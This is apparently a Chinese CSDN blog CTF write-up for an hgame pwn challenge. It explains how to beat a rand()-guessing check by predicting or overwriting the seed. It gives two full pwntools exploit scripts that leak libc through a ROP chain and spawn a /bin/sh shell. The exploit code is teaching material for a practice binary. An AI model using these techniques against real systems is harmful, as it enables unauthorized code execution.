随机数问题解决

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量393 收藏 2
点赞数 14
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880074/article/details/136545415
版权

在hgameweek1中遇到一道有关随机数的栈题,之前也没有做过这类题型,今天就通过这一道题简单讲一下它的两个解决方法吧。

先看一下代码

 首先看到seed和srand,不认识,百度之后是产生随机数的函数

seed( ) 用于指定随机数生成时所用算法开始的整数值,如果使用相同的seed( )值,则每次生成的随机数都相同。

这里指定的值为time0,while循环生成99个随机数并将其对100求余数后加一,我们需要每次都输入与程序产生的数字相同的数才能通过if语句,进入myread函数进行栈溢出,所以我们需要得出系统产生的随机数的值。第一种方法正如上面所说,如果使用相同的seed( )值,则每次生成的随机数都相同。

我们可以导入调用ctypes库中的cdll.Loadlibrary('libc.so,6')创建一个CDLL对象,在通过对象调用srand(time(0)),循环99次调用elf.rand()

from pwn import*
import ctypes
context(os='linux', arch='amd64', log_level='debug')
p=process('./pwn4')
elf=ELF('./pwn4')
libc=ELF('./libc.so.6')
def bug():
	gdb.attach(p)
	pause() 
rdi=0x0000000000401423
read=0x40125d
p.recvuntil(b'Menlina: Well tarnished, tell me thy name.')
payload=b'\x00'*10+b'a'*4+p32(1)
#bug()
p.send(payload)
 
elf1=ctypes.CDLL("libc.so.6")
elf1.srand(1)
 
for i in range(99):
    payload = p32(elf1.rand()%100+1)
    p.recvuntil(b'Please guess the number:\n')
    p.send(payload)
p.recvuntil(b"Here's a reward to thy brilliant mind.")
payload=b'a'*(0x30+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(read)
p.sendline(payload)
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
print(hex(libc_base))
system = libc_base + libc.symbols['system']
binsh = libc_base +next(libc.search(b'/bin/sh'))
payload=b'a'*(0x30+8)+p64(rdi)+p64(binsh)+p64(rdi+1)+p64(system)
p.sendline(payload)
p.interactive()

这里可能需要多运行几次才能成功。

第二种方法是将seed里的参数覆盖成我们指定的参数0,1,2。。。。。。然后我们可以通过写c语音程序打印出其对应的随机数顺序,依次传入

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn4")
libc=ELF("./libc.so.6")
elf=ELF("./pwn4")
def bug():
          gdb.attach(p)
          pause()
rdi=0x0000000000401423
read=0x40125D
a=[84,87,78,16,94,36,87,93,50,22,63,28,91,60,64,27,41,27,73,37,12,69,68,30,83,31,63,24,68,36,30,3,23,59,70,68,94,57,12,43,30,74,22,20,85,38,99,25,16,71,14,27,92,81,57,74,63,71,97,82,6,26,85,28,37,6,47,30,14,58,25,96,83,46,15,68,35,65,44,51,88,9,77,79,89,85,4,52,55,100,33,61,77,69,40,13,27,87,95]      
p.recvuntil("Menlina: Well tarnished, tell me thy name.")
pay=b'\x00'*(0x12)
p.send(pay)
#bug()
for i in range(len(a)):
    p.recvuntil("Please guess the number:\n")
    p.send(p32(a[i]))

    
p.recvuntil("Here's a reward to thy brilliant mind.")
payload1=b'a'*(0x30+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(read)
p.sendline(payload1)


libc_base =u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()
payload2=b'a'*(0x30+8)+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
p.sendline(payload2)
p.interactive()

成功攻破随机数之后就是一道简单的libc类型题了,这里就不过多去说了。

笙南!
关注
  • 14
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
随机数问题
zenkle的博客
09-18 272
1、随机数问题:希望掉落2或者4。 1⃣️使用 std::time() 函数取得一个每次都不一样的时间作为种子数值 2⃣️使用 std::srand() 函数设置这个种子数值初始化随机数发生器 3⃣️使用 std::rand() 函数根据我们所需要缩放的范围进行取余处理制造我们所需要的随机数 1.1      std::time() 函数            传入 NULL 空值,就能...
JavaScript随机数的组合问题案例分析
10-15
为了解决这个问题,作者首先展示了如何将一个生成1-7的随机数函数转换为生成1-5的随机数函数。这个过程相对直接,只需要在一个循环内不断调用原函数,直到生成的随机数小于等于5为止。这种方法的关键在于确保生成的...
解决Go中使用seed得到相同随机数问题
09-18
这个问题主要出现在连续调用`rand.Seed()`并立即生成随机数的情况下。 1. **重复的随机数问题**: 当我们连续调用`rand.Seed(time.Now().Unix())`并在短时间内生成随机数时,由于`time.Now().Unix()`返回的是自...
c# Random快速连续产生相同随机数解决方案
10-30
C# Random快速连续产生相同随机数解决方案 C# Random类是.NET Framework中提供的一种随机数生成器,用于生成伪随机数。然而,在实际应用中,我们可能会遇到一个奇怪的问题:快速连续产生相同的随机数。这是因为...
jQuery基于随机数解决中午吃什么去哪吃问题示例
10-17
主要介绍了jQuery基于随机数解决中午吃什么去哪吃问题,涉及jQuery基于事件响应及随机数动态操作页面元素相关实现技巧,需要的朋友可以参考下
随机数的一个问题
qq_43702629的博客
06-04 144
这是我以前碰到过的一个问题,实质还是没有理本质,看下面的程序 #include<iostream> #include<time.h> #include<cstdlib> using namespace std; int Random()//这个函数假设返回随机值 { srand((unsigned)time(NULL));//这里time(NULL)函数...
有关随机数的一些问题
weixin_43201538的博客
11-08 286
导读 这里随机数问题介绍3个题目,可以算是一大类的吧。 话不多说,直接看题: 第一题:基础题目 思路: 用随机数1——5, 来产生随机数1——7。 就要想办法通过已有的条件1——5,来凑! 首先要有个0出来,方便后面计算。rand1To5() - 1 : 可产生:0,1,2,3,4 这些范围比7小,还要连续的数字都要有,(4后面是5,所以乘以5) 那么rand1To5() * 5 可产生...
随机数_简学:随机数问题
weixin_28752743的博客
12-05 203
随机是概率论用语,指事前不可预言的,即在相同条件下重复进行试验,每次结果未必相同,或知道事物过去的状况,但未来的发展却不能完全肯定,随机也有“真随机”与“伪随机”。“真随机”比如量子力学,因为一个放射性物质原子下一分钟是否发生衰变是真正随机的,不可预言的;“伪随机”由经过系统的不同的因素造成,或是由于忽略细节不考虑某些因素之后,在宏观上呈现出来的结果,比如扔骰子、玩转轮等,若能精准确定受力因素、阻...
随机数常见问题解决方案
Erick.Wang
01-12 2182
随机数常见问题解决方案: 1、运行多次,为什么每次生成的随机数都是同样的数字?如何生成不同数字? 2、如何随机生成指定范围内的数字?如何生成指定精度的随机数? 3、如何随机生成若干不同的数字,并将其存在数组中? 随机数所涉及的头文件为<stdlib.h>和<time.h>,所涉及的函数为srand(),rand(),现在通过实验代码解决以上问题
随机数生成问题小结
cstn_kdlx的专栏
03-07 3678
随机数在很多程序都会使用,最常用的生成随机数的方法就是c的标准函数库提供的随机数生成器rand(定义在stdlib.h中),能返回0-RAND_MAX之间均匀分布的伪随机整数(RAND_MAX至少为32767,一般都默认为32767)。若直接调用rand(),每次运行生成的随机数都是相同的,这是因为rand()在生成伪随机数时需要一个种子(种子默认值是1),作为计算伪随机数的初始值,如果种子相同,
随机数生成算法
Fying2016的博客
06-04 5万+
转自:https://www.cnblogs.com/ECJTUACM-873284962/p/6926203.html 1、蒙特卡洛法   蒙特卡罗方法又称统计模拟法、随机抽样技术,是一种随机模拟方法,以概率和统计理论方法为基础的一种计算方法,是使用随机数(或更常见的伪随机数)来解决很多计算问题的方法。将所求问题同一定的概率模型相联系,用电子计算机实现统计模拟或抽样,以获得问题的近似...
等概率随机函数的实现
编程资料大全
04-22 172
题目:已知随机函数rand(),以p的概率产生0,以1-p的概率产生1,现在要求设计一个新的随机函数newRand(), 使其以1/n的等概率产生1~n之间的任意一个数。解决思路:可以通过已知随机函数rand()产生等概率产生0和1的新随机函数Rand(),然后调用k(k为整数n的二进制表示的位数)次Rand()函数,得到一个长度为k的0和1序列,以此序列所形成的整数即为1--n之间的数字。注意:...
Lua 随机数生成问题
热门推荐
zhangxaochen的专栏
10-21 15万+
原文链接:http://blog.csdn.net/zhangxaochen/article/details/8095007 Lua 生成随机数需要用到两个函数: math.randomseed(xx), math.random([n [, m]]) 1. math.randomseed(n) 接收一个整数 n 作为随机序列种子。 2. math.random([n [, m]])
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 645
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
一个C#随机数问题解决随机数重复
05-24
为了解决这个问题,我们可以使用不同的种子来生成不同的随机数。 下面是一个示例代码,它使用当前时间作为种子来生成随机数: ``` Random rnd = new Random(DateTime.Now.Millisecond); int randomNumber = rnd....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值